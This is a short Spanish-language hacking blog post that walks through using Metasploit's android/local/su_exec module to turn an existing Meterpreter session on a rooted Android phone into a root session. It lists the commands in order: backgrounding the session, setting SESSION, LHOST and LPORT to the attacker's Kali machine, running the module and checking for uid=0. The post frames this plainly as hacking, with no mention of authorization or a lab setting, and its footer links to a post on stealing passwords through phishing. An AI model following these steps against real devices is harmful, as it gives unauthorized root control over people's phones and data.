Como hackear android con metasploit escalando privilegios a administrador

Como hackear android con metasploit escalando privilegios a administrador

Aquí tienes los pasos para usar el módulo exploit/android/local/su_exec en Metasploit.


Requisitos

Antes de empezar, necesitas:

  1. Una sesión de Meterpreter activa en un dispositivo Android.

  2. Un dispositivo Android que ya esté rooteado (es decir, que tenga el binario su instalado).

Este módulo no es un exploit en el sentido tradicional. No busca una vulnerabilidad. Simplemente se aprovecha de la presencia del comando su para obtener una nueva sesión con privilegios de root.


Pasos

  1. Vuelve a la consola de Metasploit:

    Si estás dentro de una sesión de Meterpreter, usa el comando background para volver a la línea de comandos principal de Metasploit.

  2. Carga el módulo:

    Usa el comando use para seleccionar el módulo su_exec.

    Bash
    msf6 > use exploit/android/local/su_exec
    
  3. Configura las opciones:

    El módulo tiene varias opciones que debes configurar. Para verlas, usa el comando show options.

    Bash
    msf6 exploit(android/local/su_exec) > show options
    

    Las opciones más importantes son:

    • SESSION: El número de la sesión de Meterpreter que quieres usar para ejecutar el módulo. Puedes ver las sesiones activas con el comando sessions -i.

    • LHOST y LPORT: Si el exploit crea una nueva sesión de Meterpreter, necesitarás configurar la dirección IP y el puerto de tu máquina Kali Linux.

    Establece el número de sesión y el LHOST y LPORT si es necesario.

    Bash
    msf6 exploit(android/local/su_exec) > set SESSION 1
    msf6 exploit(android/local/su_exec) > set LHOST 192.168.1.100  # Tu IP de Kali
    msf6 exploit(android/local/su_exec) > set LPORT 4444          # El puerto
    
  4. Ejecuta el módulo:

    Una vez que las opciones están configuradas, ejecuta el exploit con el comando run o exploit.

    Bash
    msf6 exploit(android/local/su_exec) > run
    

¿Qué ocurre después?

Si el módulo tiene éxito, verás un mensaje que indica que se ha abierto una nueva sesión de Meterpreter. Puedes verificar si la sesión tiene privilegios de root con el comando getuid.

Bash
meterpreter > getuid
Server UID: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0

Si el uid es 0, significa que has obtenido privilegios de root.

Si el comando falla o no se abre una nueva sesión, es posible que el dispositivo no esté rooteado o que el binario su no esté configurado correctamente. Recuerda que este módulo solo funciona en dispositivos que ya han sido rooteados.

Entradas populares de este blog

Ciberseguridad y hacking con Whatweb

Como robar contraseñas haciendo un phishing web

Arsenal software hacking NFC